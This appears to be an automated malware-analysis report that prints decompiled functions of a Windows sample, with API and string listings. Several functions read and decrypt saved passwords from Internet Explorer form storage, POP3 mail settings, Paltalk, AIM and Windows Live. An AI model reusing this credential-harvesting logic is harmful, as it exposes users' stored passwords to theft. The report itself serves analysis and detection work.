                                • API ID: Window$LongRect$ClassCopyMessageNameParentPointsSendText
                                • String ID:
                                • API String ID: 2317770421-0
                                • Opcode ID: 7af2e41bf762aae8540d43ee514e8ccf414c9672fa24b186be0172eacc68f4a9
                                • Instruction ID: beb27d93b7d0259d1707648e93b0cb5b486bd7e44cd55be4178ee0c76b875b45
                                • Opcode Fuzzy Hash: 7af2e41bf762aae8540d43ee514e8ccf414c9672fa24b186be0172eacc68f4a9
                                • Instruction Fuzzy Hash: BF21A6B5500B01EFD7609F75DC88AD7BBEDFB88700F00CA2DA5AAD2254DA306541CFA4
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: memcpy
                                • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                • API String ID: 3510742995-3273207271
                                • Opcode ID: 13415ff2963e6dace8cd86106c59db4403270bd4b6c64038e468014c2b1c2be9
                                • Instruction ID: f5a03e54b86e24f841f817b97e8ec33e4e13f45a83786b80a5cfcbc9bb1d817d
                                • Opcode Fuzzy Hash: 13415ff2963e6dace8cd86106c59db4403270bd4b6c64038e468014c2b1c2be9
                                • Instruction Fuzzy Hash: 0401DFB2EC465475EB3201093E4AFE72A4447B7B21F660667F589A0285E0DD0EF381BF
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • memset.MSVCRT ref: 004102AA
                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000,?,75D6F420,00000000), ref: 004102C3
                                • _strnicmp.MSVCRT ref: 004102DF
                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00418AE0,000000FF,?,000000FF,00000000,00000000,?,?,?,?,75D6F420,00000000), ref: 0041030D
                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,000000FF,00000000,00000000,?,?,?,?,75D6F420,00000000), ref: 0041032C
                                Strings
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp
                                Similarity
                                • API ID: ByteCharMultiWide$_strnicmpmemset
                                • String ID: WindowsLive:name=*$windowslive:name=
                                • API String ID: 2393399448-3589380929
                                • Opcode ID: 71b69f7c8173fc3aa574efd14f73b3720c8d0a19d14fe5437baa1e670a90085b
                                • Instruction ID: 25a7ce4e34514ebc1ab433be8417aa6076f8fd68c633d2ab3a6fecdf2bbac582
                                • Opcode Fuzzy Hash: 71b69f7c8173fc3aa574efd14f73b3720c8d0a19d14fe5437baa1e670a90085b
                                • Instruction Fuzzy Hash: 59414DB190021EAFDB149F94DD849EEB7BCBF08304F1441AAE915A3251D774EEC4CBA8
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 82%
                                			E0040821A(void* __eflags, intOrPtr _a4) {
                                				int _v8;
                                				int _v12;
                                				int _v16;
                                				void* _v20;
                                				intOrPtr _v24;
                                				int _v28;
                                				intOrPtr _v32;
                                				void _v287;
                                				char _v288;
                                				void* __esi;
                                				void** _t43;
                                				intOrPtr _t80;
                                				void* _t84;
                                				void* _t85;
                                				void* _t86;
                                
                                				_t80 = _a4;
                                				_v32 = _t80 + 0x24;
                                				E0040733E(_t80 + 0x24);
                                				_t43 =  &_v20;
                                				0x411d68(0x80000001, "Software\Microsoft\Internet Explorer\IntelliForms\Storage2", _t43);
                                				_t85 = _t84 + 0xc;
                                				if(_t43 == 0) {
                                					_v16 = 0;
                                					_v24 = _t80 + 0x64;
                                					E0040746B(_t80 + 0x64, 0x2000);
                                					_v28 = 0;
                                					_v12 = 0xff;
                                					_v8 = 0x2000;
                                					_v288 = 0;
                                					memset( &_v287, 0, 0xff);
                                					_t86 = _t85 + 0xc;
                                					if(RegEnumValueA(_v20, 0,  &_v288,  &_v12, 0,  &_v28, E004074AA(_v24),  &_v8) != 0) {
                                						L4:
                                						return RegCloseKey(_v20);
                                					}
                                					_a4 = _a4 + 0x44;
                                					do {
                                						0x413df2( &_v288);
                                						E00407364(_v32,  &_v288, 0xffffffff);
                                						E00407364(_a4, E004074AA(_v24), _v8);
                                						_v16 = _v16 + 1;
                                						_v28 = 0;
                                						_v12 = 0xff;
                                						_v8 = 0x2000;
                                						_v288 = 0;
                                						memset( &_v287, 0, 0xff);
                                						_t86 = _t86 + 0xc;
                                					} while (RegEnumValueA(_v20, _v16,  &_v288,  &_v12, 0,  &_v28, E004074AA(_v24),  &_v8) == 0);
                                					goto L4;
                                				}
                                				return _t43;
                                			}



















                                APIs
                                  • Part of subcall function 0040733E: ??3@YAXPAX@Z.MSVCRT ref: 00407341
                                  • Part of subcall function 0040733E: ??3@YAXPAX@Z.MSVCRT ref: 00407349
                                  • Part of subcall function 00411D68: RegOpenKeyExA.KERNELBASE(80000001,80000001,00000000,00020019,80000001,00402850,80000001,Software\AIM\AIMPRO,?), ref: 00411D7B
                                  • Part of subcall function 0040746B: ??3@YAXPAX@Z.MSVCRT ref: 00407478
                                • memset.MSVCRT ref: 00408286
                                • RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,?,00000000,?), ref: 004082AF
                                • _strupr.MSVCRT ref: 004082CD
                                  • Part of subcall function 00407364: strlen.MSVCRT ref: 00407375
                                  • Part of subcall function 00407364: ??3@YAXPAX@Z.MSVCRT ref: 00407398
                                  • Part of subcall function 00407364: ??3@YAXPAX@Z.MSVCRT ref: 004073BB
                                  • Part of subcall function 00407364: memcpy.MSVCRT ref: 004073DB
                                • memset.MSVCRT ref: 00408313
                                • RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,?,00000000,?), ref: 0040833E
                                • RegCloseKey.ADVAPI32(?), ref: 0040834F
                                Strings
                                • Software\Microsoft\Internet Explorer\IntelliForms\Storage2, xrefs: 00408237
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp
                                Similarity
                                • API ID: ??3@$EnumValuememset$CloseOpen_struprmemcpystrlen
                                • String ID: Software\Microsoft\Internet Explorer\IntelliForms\Storage2
                                • API String ID: 373939914-680441574
                                • Opcode ID: 595d46858c789d7861cec1ba9a6a44fece00a80f0e7bf05d1a4c71afb02c0405
                                • Instruction ID: e14454ebfdff30ad66f99699cc9b695ae8a68f87cdcb03d8fe41683d15f76d0b
                                • Opcode Fuzzy Hash: 595d46858c789d7861cec1ba9a6a44fece00a80f0e7bf05d1a4c71afb02c0405
                                • Instruction Fuzzy Hash: 5141EDB2D0011DAFDB11DF99DC829DEBBBCAF14304F10406ABA05F2151E634AB45CB95
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 65%
                                			E00407A93(intOrPtr* _a4, void* _a8, intOrPtr _a12) {
                                				int _v12;
                                				int _v16;
                                				unsigned int _v20;
                                				int _v24;
                                				int _v28;
                                				char _v32;
                                				char* _v36;
                                				char _v40;
                                				char _v296;
                                				char _v552;
                                				char _v808;
                                				char _v1064;
                                				void _v2087;
                                				char _v2088;
                                				void* __ebx;
                                				void* __edi;
                                				void* __esi;
                                				long _t42;
                                				char* _t66;
                                				void* _t70;
                                
                                				_v2088 = 0;
                                				memset( &_v2087, 0, 0x3ff);
                                				_v12 = 0x400;
                                				_v1064 = 0;
                                				_v808 = 0;
                                				_v552 = 0;
                                				_v296 = 0;
                                				_t42 = RegQueryValueExA(_a8, "POP3_credentials", 0,  &_v16,  &_v2088,  &_v12);
                                				_t74 = _t42;
                                				if(_t42 != 0) {
                                					return _t42;
                                				}
                                				_v32 = 0;
                                				_v24 = 0;
                                				_v28 = 0;
                                				if(E00404C9D( &_v32, _t74) != 0) {
                                					_v36 =  &_v2088;
                                					_v40 = _v12;
                                					if(E00404CF5( &_v32,  &_v40, 0,  &_v20) != 0) {
                                						 *((char*)(_t70 + WideCharToMultiByte(0, 0, _v16, _v20 >> 1,  &_v552, 0xfd, 0, 0) - 0x224)) = 0;
                                						LocalFree(_v16);
                                						0x411d82(_a8, "POP3_name");
                                						0x411d82(_a8, "POP3_host");
                                						_t66 =  &_v1064;
                                						E00406958(0xff, _t66, _a12);
                                						 *((intOrPtr*)( *_a4))(_t66);
                                					}
                                				}
                                				return E00404CE0( &_v32);
                                			}
























                                APIs
                                • memset.MSVCRT ref: 00407AB4
                                • RegQueryValueExA.ADVAPI32(?,POP3_credentials,00000000,?,?,?), ref: 00407AF3
                                  • Part of subcall function 00404C9D: LoadLibraryA.KERNELBASE(crypt32.dll,00000000,00404771,?,?), ref: 00404CAA
                                  • Part of subcall function 00404C9D: GetProcAddress.KERNEL32(00000000,CryptUnprotectData), ref: 00404CBC
                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,000000FD,00000000,00000000,?,00000000,?), ref: 00407B57
                                • LocalFree.KERNEL32(?), ref: 00407B67
                                  • Part of subcall function 00411D82: RegQueryValueExA.KERNELBASE(?,?,00000000,?,?,?,00000008,00000008,?,0040275E,?,TRIPWD), ref: 00411D9B
                                  • Part of subcall function 00406958: strlen.MSVCRT ref: 0040695D
                                  • Part of subcall function 00406958: memcpy.MSVCRT ref: 00406972
                                Strings
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp
                                Similarity
                                • API ID: QueryValue$AddressByteCharFreeLibraryLoadLocalMultiProcWidememcpymemsetstrlen
                                • String ID: POP3_credentials$POP3_host$POP3_name
                                • API String ID: 2752996003-2190619648
                                • Opcode ID: f9e0cc1d15b7ae483417ba89dbd2acaad5c80dd12f00609131e53948eb699b81
                                • Instruction ID: 3c80738b82331245788ee24e24f692cafec0a237d8f87c7d6b462bdafe46d179
                                • Opcode Fuzzy Hash: f9e0cc1d15b7ae483417ba89dbd2acaad5c80dd12f00609131e53948eb699b81
                                • Instruction Fuzzy Hash: 9F312DB190121DAFDB11DF99DD81AEEBBBCEF48304F4040AAE955B3251D634AF448BA4
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                  • Part of subcall function 00411D68: RegOpenKeyExA.KERNELBASE(80000001,80000001,00000000,00020019,80000001,00402850,80000001,Software\AIM\AIMPRO,?), ref: 00411D7B
                                • memset.MSVCRT ref: 00410F48
                                  • Part of subcall function 00411DEE: RegEnumKeyExA.ADVAPI32(?,000000FF,000000FF,?,00000000,00000000,00000000,000000FF,000000FF), ref: 00411E11
                                • memset.MSVCRT ref: 00410F92
                                • RegCloseKey.ADVAPI32(?), ref: 00410FF6
                                • RegCloseKey.ADVAPI32(?), ref: 0041101F
                                Strings
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp
                                Similarity
                                • API ID: Closememset$EnumOpen
                                • String ID: Software\Paltalk$nickname$pwd
                                • API String ID: 1938129365-1014362899
                                • Opcode ID: 371f017254c023b24f35e6f21b54137d424e2b90dbe38bf80ef2b31f4a61ba7b
                                • Instruction ID: 96d414647358d9b2c810da9b3bce946d65dcecd18022e5434843d59e9988e6f9
                                • Opcode Fuzzy Hash: 371f017254c023b24f35e6f21b54137d424e2b90dbe38bf80ef2b31f4a61ba7b
                                • Instruction Fuzzy Hash: 7B3164B1D4011DAFDF11AB95DD42BEE7B7DAF18304F0000A6F604A2111D7399F95CB65
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 37%
                                			E004044DE(char _a4) {
                                				signed int _v8;
                                				void* _v12;
                                				void* _v16;
                                				int _t17;
                                				_Unknown_base(*)()* _t19;
                                				void* _t20;
                                				_Unknown_base(*)()* _t22;
                                				void* _t24;
                                				void* _t25;
                                				void* _t27;
                                				void* _t33;
                                
                                				_v8 = _v8 & 0x00000000;
                                				_t17 =  &_v8;
                                				0x410daa(0xffffffff, 0xe,  &_v16);
                                				if(_t17 == 0) {
                                					L10:
                                					if(_v8 == 0) {
                                						return _t17;
                                					}
                                					return FreeLibrary(_v8);
                                				}
                                				_t25 = _v16;
                                				0x410d8a(_t33, _t24);
                                				if(_t17 == 0) {
                                					L9:
                                					_t17 = CloseHandle(_v16);
                                					goto L10;
                                				}
                                				_t19 = GetProcAddress(_v8, "DuplicateToken");
                                				if(_t19 != 0) {
                                					_t20 =  *_t19(_t25, 2,  &_v12);
                                					if(_t20 != 0) {
                                						_t27 = _v12;
                                						0x410d8a();
                                						if(_t20 != 0) {
                                							_t22 = GetProcAddress(_v8, "SetThreadToken");
                                							if(_t22 != 0) {
                                								 *_t22( &_a4, _t27);
                                							}
                                						}
                                						CloseHandle(_v12);
                                					}
                                				}
                                				goto L9;
                                			}















                                APIs
                                  • Part of subcall function 00410DAA: GetProcAddress.KERNEL32(00000000,OpenProcessToken), ref: 00410DC0
                                • FreeLibrary.KERNEL32(00000000,000000FF,0000000E,?,?,0040428D), ref: 0040456E
                                  • Part of subcall function 00410D8A: LoadLibraryA.KERNEL32(advapi32.dll,00410DB5,00000000,00000000,004044F8,000000FF,0000000E,?,?,0040428D), ref: 00410D94
                                • GetProcAddress.KERNEL32(00000000,DuplicateToken), ref: 0040451C
                                • GetProcAddress.KERNEL32(00000000,SetThreadToken), ref: 00404543
                                • CloseHandle.KERNEL32(?), ref: 00404553
                                • CloseHandle.KERNEL32(?,00000000,000000A0,000000FF,0000000E,?,?,0040428D), ref: 0040455D
                                Strings
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp
                                Similarity
                                • API ID: AddressProc$CloseHandleLibrary$FreeLoad
                                • String ID: DuplicateToken$SetThreadToken
                                • API String ID: 3357505703-785560009
                                • Opcode ID: ead61f231025bced0a09c2f1fb3dd8adab68ce1b78bee45ece79c7bb5241faa8
                                • Instruction ID: fb771c117c903999f7ab115302b4b85a9bfa7a6589c8aae05a31450a7ce75296
                                • Opcode Fuzzy Hash: ead61f231025bced0a09c2f1fb3dd8adab68ce1b78bee45ece79c7bb5241faa8
                                • Instruction Fuzzy Hash: D4113071900109FBDB10E7A5DD55EEE7B78AF84340F144176A611B10E1EB74DF44DA68
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 37%
                                			E00408FBC(void* __eflags, intOrPtr _a4) {
                                				void* _t3;
                                				int _t4;
                                				void* _t10;
                                				void* _t13;
                                
                                				_t3 = E004069D3(_a4);
                                				if(_t3 != 0) {
                                					0x413d0c(0x41e200, _a4, _t10, _t13);
                                					0x413d0c(0x41e308, "general");
                                					_t4 = GetPrivateProfileIntA(0x41e308, "rtl", 0, 0x41e200);
                                					asm("sbb eax, eax");
                                					 *0x41e34c =  ~(_t4 - 1) + 1;
                                					 *0x41e350 = 0;
                                					return GetPrivateProfileStringA(0x41e308, "charset", 0x417c88, 0x41e350, 0x3f, 0x41e200);
                                				}
                                				return _t3;
                                			}








                                APIs
                                  • Part of subcall function 004069D3: GetFileAttributesA.KERNELBASE(0040390F,0040D4DB,0040390F,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 004069D7
                                • _mbscpy.MSVCRT ref: 00408FD6
                                • _mbscpy.MSVCRT ref: 00408FE6
                                • GetPrivateProfileIntA.KERNEL32(0041E308,rtl,00000000,0041E200), ref: 00408FF7
                                • GetPrivateProfileStringA.KERNEL32(0041E308,charset,00417C88,0041E350,0000003F,0041E200), ref: 00409022
                                Strings
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp
                                Similarity
                                • API ID: PrivateProfile_mbscpy$AttributesFileString
                                • String ID: charset$general$rtl
                                • API String ID: 888011440-3784062100
                                • Opcode ID: 55f41d98300eda273b6a0d0ace1f1b61fb276ed63f1592d27e33da27b08274f9
                                • Instruction ID: ef4fb33988e1ec7767552a7ed3f3ae2affcfc9826048e3bb16e6b0e4c8ee98e3
                                • Opcode Fuzzy Hash: 55f41d98300eda273b6a0d0ace1f1b61fb276ed63f1592d27e33da27b08274f9
                                • Instruction Fuzzy Hash: 2CF0B43568020879E3111712AC0AFFB6E68EB86F11F18843FBC14921D1D67D494185AD
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 78%
                                			E00405865(void* __ecx, void* __eflags, intOrPtr* _a4, intOrPtr _a8) {
                                				intOrPtr* _v8;
                                				char* _v12;
                                				intOrPtr* _v16;
                                				int _v20;
                                				char _v22;
                                				char _v23;
                                				signed int _v24;
                                				int _v28;
                                				int _v32;
                                				char _v36;
                                				intOrPtr _v40;
                                				intOrPtr _v44;
                                				void _v172;
                                				char _v300;
                                				char _v1319;
                                				char _v1320;
                                				char _v1321;
                                				char _v1322;
                                				void _v1323;
                                				char _v1324;
                                				void _v1547;
                                				void _v1580;
                                				void* __ebx;
                                				void* __edi;
                                				void* _t90;
                                				void* _t98;
                                				int _t106;
                                				signed int _t112;
                                				signed int _t118;
                                				void* _t119;
                                				intOrPtr* _t128;
                                				void* _t129;
                                				void* _t130;
                                				void* _t132;
                                				signed int _t136;
                                				int _t147;
                                				signed int* _t152;
                                				void* _t153;
                                				void* _t154;
                                				void* _t155;
                                
                                				_t130 = __ecx;
                                				_v36 = 0;
                                				_v1324 = 0;
                                				memset( &_v1323, 0, 0x3ff);
                                				_v44 = 0xffff;
                                				_v40 = 0xffff;
                                				_v300 = 0;
                                				_v172 = 0;
                                				_v20 = 0;
                                				_v32 = 0;
                                				_v28 = 0;
                                				_t90 = E00407193(_a8, _t130,  &_v1324, 0x3ff,  &_v36);
                                				_t155 = _t154 + 0x18;
                                				while(_t90 != 0) {
                                					if(_v20 == _v44 + 2) {
                                						_push( &_v1323);
                                						_t129 = 0x7f;
                                						_v32 = 1;
                                						E00406958(_t129,  &_v300);
                                					}
                                					if(_v20 == _v40 + 2) {
                                						_v28 = 1;
                                						_t106 = strlen( &_v1324);
                                						if(_v1323 == 0x27) {
                                							_t24 = _t106 - 3; // -3
                                							if(_t24 <= 0x7c &&  *((char*)(_t153 + _t106 - 0x529)) == 0x27) {
                                								_t136 = 8;
                                								memcpy( &_v1580, 0x418128, _t136 << 2);
                                								asm("movsb");
                                								_t147 = 0;
                                								memset( &_v1547, 0, 0xdf);
                                								memset( &_v172, 0, 0x80);
                                								_t112 = _v1322;
                                								_t155 = _t155 + 0x24;
                                								if(_t112 != 0x27) {
                                									_v16 =  &_v1322;
                                									_v8 =  &_v1319;
                                									_t128 =  &_v1320;
                                									_v12 =  &_v1321;
                                									while(_t112 != 0) {
                                										if(_t112 != 0x5c) {
                                											_v12 = _v12 + 1;
                                											_v8 = _v8 + 1;
                                											_t152 = _t153 + _t147 - 0xa8;
                                											_t128 = _t128 + 1;
                                											_v16 = _v16 + 1;
                                											 *_t152 = _t112;
                                										} else {
                                											_t118 =  *_t128;
                                											if( *_v12 != 0x78) {
                                												if(_t118 == 0x66) {
                                													_t118 = _t118 + 0xa6;
                                												}
                                												if(_t118 == 0x72) {
                                													_t118 = _t118 + 0x9b;
                                												}
                                												if(_t118 == 0x30) {
                                													_t118 = 0;
                                												}
                                												if(_t118 == 0x6e) {
                                													_t118 = _t118 + 0x9c;
                                												}
                                												if(_t118 == 0x74) {
                                													_t118 = _t118 + 0x95;
                                												}
                                												if(_t118 == 0x76) {
                                													_t118 = _t118 + 0x95;
                                												}
                                												if(_t118 == 0x61) {
                                													_t118 = _t118 + 0xa6;
                                												}
                                												if(_t118 == 0x62) {
                                													_t118 = _t118 + 0xa6;
                                												}
                                												_t152 = _t153 + _t147 - 0xa8;
                                												_push(2);
                                											} else {
                                												_v24 = _t118;
                                												_v23 =  *_v8;
                                												_v22 = 0;
                                												_t152 = _t153 + _t147 - 0xa8;
                                												_t118 = E00406D5A( &_v24);
                                												_push(4);
                                											}
                                											 *_t152 = _t118;
                                											_pop(_t119);
                                											_v12 = _v12 + _t119;
                                											_v8 = _v8 + _t119;
                                											_t128 = _t128 + _t119;
                                											_v16 = _v16 + _t119;
                                										}
                                										 *_t152 =  *(_t153 + _t147 - 0x628) ^  *_t152 ^ 0x00000031;
                                										_t112 =  *_v16;
                                										_t147 = _t147 + 1;
                                										if(_t112 != 0x27) {
                                											continue;
                                										}
                                										goto L33;
                                									}
                                								}
                                							}
                                						}
                                					}
                                					L33:
                                					if(_v32 != 0 && _v28 != 0) {
                                						 *((intOrPtr*)( *_a4))( &_v300);
                                						_v32 = 0;
                                						_v28 = 0;
                                						_v172 = 0;
                                						_v300 = 0;
                                					}
                                					if(E004070E4( &_v1324, ?str?) >= 0) {
                                						_v44 = _v20;
                                					}
                                					_t98 = E004070E4( &_v1324, "S'password'");
                                					_pop(_t132);
                                					if(_t98 >= 0) {
                                						_v40 = _v20;
                                					}
                                					_v20 = _v20 + 1;
                                					_t90 = E00407193(_a8, _t132,  &_v1324, 0x3ff,  &_v36);
                                					_t155 = _t155 + 0xc;
                                				}
                                				return _t90;
                                 			}

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp
                                Similarity
                                • API ID: memset$strlen
                                • String ID: '$'$S'password'$S'username'
                                • API String ID: 3337090206-859024053
                                • Opcode ID: e1cab7f00341b9ec69ea1fd77629a3ef37b3dcc5a417ad93794562d5d2f9417f
                                • Instruction ID: 095c589e2a809376e97825867b0f887a5e853f6b8f709b3ead32f3d6acc6b9c2
                                • Opcode Fuzzy Hash: e1cab7f00341b9ec69ea1fd77629a3ef37b3dcc5a417ad93794562d5d2f9417f
                                • Instruction Fuzzy Hash: A5716071D0065DAECF21DB94C881BEFBBB4EF1A314F5041ABD444B7282D6385A8A8F59
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 37%
                                			E0040AC28(void* __eax) {
                                				void* _v36;
                                				long _v40;
                                				intOrPtr _v44;
                                				intOrPtr _v52;
                                				void* _v68;
                                				long _t21;
                                				void* _t24;
                                				long _t26;
                                				long _t34;
                                				long _t37;
                                				intOrPtr* _t40;
                                				void* _t42;
                                				intOrPtr* _t44;
                                				intOrPtr* _t45;
                                				void* _t47;
                                
                                				_t40 =  *0x415030; // 0x74191ab0
                                				_t47 = __eax;
                                				_t44 =  *0x415040; // 0x74192040
                                				if( *((intOrPtr*)(__eax + 0x198)) != 0) {
                                					_t37 =  *_t40(0x10, 0x10, 0x19, 1, 1);
                                					 *(__eax + 0x18c) = _t37;
                                					 *_t44(_t37, 1);
                                					SendMessageA( *(__eax + 0x184), 0x1003, 1,  *(__eax + 0x18c));
                                				}
                                				if( *((intOrPtr*)(_t47 + 0x19c)) != 0) {
                                					_t34 =  *_t40(0x20, 0x20, 0x19, 1, 1);
                                					 *(_t47 + 0x190) = _t34;
                                					 *_t44(_t34, 1);
                                					SendMessageA( *(_t47 + 0x184), 0x1003, 0,  *(_t47 + 0x190));
                                				}
                                				_t21 =  *_t40(0x10, 0x10, 0x19, 1, 1);
                                				 *(_t47 + 0x188) = _t21;
                                				 *_t44(_t21, 2);
                                				_v36 = LoadImageA( *0x41dbd4, 0x85, 0, 0x10, 0x10, 0x1000);
                                				_t24 = LoadImageA( *0x41dbd4, 0x86, 0, 0x10, 0x10, 0x1000);
                                				_t42 = _t24;
                                				 *_t44( *(_t47 + 0x188), 0);
                                				_t26 = GetSysColor(0xf);
                                				_t45 =  *0x41503c; // 0x741923b0
                                				_v40 = _t26;
                                				 *_t45( *(_t47 + 0x188), _v44, _t26);
                                				 *_t45( *(_t47 + 0x188), _t42, _v52);
                                				DeleteObject(_v68);
                                				DeleteObject(_t42);
                                				return SendMessageA(E00405068( *(_t47 + 0x184)), 0x1208, 0,  *(_t47 + 0x188));
                                 			}

                                APIs
                                • SendMessageA.USER32(?,00001003,00000001,?), ref: 0040AC75
                                • SendMessageA.USER32(?,00001003,00000000,?), ref: 0040ACAA
                                • LoadImageA.USER32(00000085,00000000,00000010,00000010,00001000), ref: 0040ACDF
                                • LoadImageA.USER32(00000086,00000000,00000010,00000010,00001000), ref: 0040ACFB
                                • GetSysColor.USER32(0000000F), ref: 0040AD0B
                                • DeleteObject.GDI32(?), ref: 0040AD3F
                                • DeleteObject.GDI32(00000000), ref: 0040AD42
                                • SendMessageA.USER32(00000000,00001208,00000000,?), ref: 0040AD60
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp
                                Similarity
                                • API ID: MessageSend$DeleteImageLoadObject$Color
                                • String ID:
                                • API String ID: 3642520215-0
                                • Opcode ID: 89608fa394cce56546426f1758b6b0ed6a96b027106975741db31758971510ff
                                • Instruction ID: 10adafa9a034a25fdfd439dfbbefb27d9cbe3ef8874ff0eb0b967345faf6b271
                                • Opcode Fuzzy Hash: 89608fa394cce56546426f1758b6b0ed6a96b027106975741db31758971510ff
                                • Instruction Fuzzy Hash: B8316171680708BFFA316B60DC47FD67695EB88B00F104829F3857A1E1CAF278909B58
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp
                                Similarity
                                • API ID: _strcmpi
                                • String ID: account$name$password$protocol
                                • API String ID: 1439213657-933060687
                                • Opcode ID: 9f4445d43ae643b9a2fe9e2fdb03cf84892fe8e67e04b4e06ad1d96e1e33e757
                                • Instruction ID: 794633c49b8c9c94e8125cdebcfe219ffcc263fe4270280c1a3d0952be7122e7
                                • Opcode Fuzzy Hash: 9f4445d43ae643b9a2fe9e2fdb03cf84892fe8e67e04b4e06ad1d96e1e33e757
                                • Instruction Fuzzy Hash: EA2130B2608702ADE718DE7598407D6F7D4BF05715F20022FE66CD2180FB39A554CB9D
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 100%
                                			E0040B3FF(void* __esi) {
                                				struct HDWP__* _v8;
                                				int _v12;
                                				intOrPtr _v16;
                                				struct tagRECT _v32;
                                				struct tagRECT _v48;
                                				void* _t32;
                                				int _t60;
                                				int _t65;
                                
                                				if( *((intOrPtr*)(__esi + 0x140)) != 0) {
                                					GetClientRect( *(__esi + 0x108),  &_v32);
                                					GetWindowRect( *(__esi + 0x114),  &_v48);
                                					_t65 = _v48.bottom - _v48.top + 1;
                                					GetWindowRect( *(__esi + 0x118),  &_v48);
                                					_v12 = _v32.right - _v32.left;
                                					_t60 = _v48.bottom - _v48.top + 1;
                                					_v16 = _v32.bottom - _v32.top;
                                					_v8 = BeginDeferWindowPos(3);
                                					DeferWindowPos(_v8,  *(__esi + 0x118), 0, 0, 0, _v12, _t60, 4);
                                					DeferWindowPos(_v8,  *(__esi + 0x114), 0, 0, _v32.bottom - _t65 + 1, _v12, _t65, 6);
                                					DeferWindowPos(_v8,  *( *((intOrPtr*)(__esi + 0x390)) + 0x184), 0, 0, _t60, _v12, _v16 - _t60 - _t65, 4);
                                					return EndDeferWindowPos(_v8);
                                				}
                                				return _t32;
                                 			}

                                APIs
                                • GetClientRect.USER32(?,?), ref: 0040B41E
                                • GetWindowRect.USER32(?,?), ref: 0040B434
                                • GetWindowRect.USER32(?,?), ref: 0040B447
                                • BeginDeferWindowPos.USER32(00000003), ref: 0040B464
                                • DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 0040B481
                                • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 0040B4A1
                                • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000004), ref: 0040B4C8
                                • EndDeferWindowPos.USER32(?), ref: 0040B4D1
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp
                                Similarity
                                • API ID: Window$Defer$Rect$BeginClient
                                • String ID:
                                • API String ID: 2126104762-0
                                • Opcode ID: 0757be7f740c367b27a432adcadcbbd04f52c6bec85c836fbe865042ee467c30
                                • Instruction ID: fdc4126930c1b8f3c9151252813053957ee6f88c11e53af12b0e4d030a96b888
                                • Opcode Fuzzy Hash: 0757be7f740c367b27a432adcadcbbd04f52c6bec85c836fbe865042ee467c30
                                • Instruction Fuzzy Hash: CA21D672900609FFDF12CFA8DD89FEEBBB9FB48310F108464FA55A2160C7316A519B24
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 92%
                                			E004072B5(void* _a4) {
                                				void* _t7;
                                				signed int _t10;
                                				int _t12;
                                				void* _t16;
                                				signed int _t18;
                                				void* _t21;
                                
                                				_t21 = _a4;
                                				_t18 = 0;
                                				EmptyClipboard();
                                				if(_t21 != 0) {
                                					_t2 = strlen(_t21) + 1; // 0x1
                                					_t12 = _t2;
                                					_t7 = GlobalAlloc(0x2000, _t12);
                                					_t16 = _t7;
                                					if(_t16 != 0) {
                                						GlobalFix(_t16);
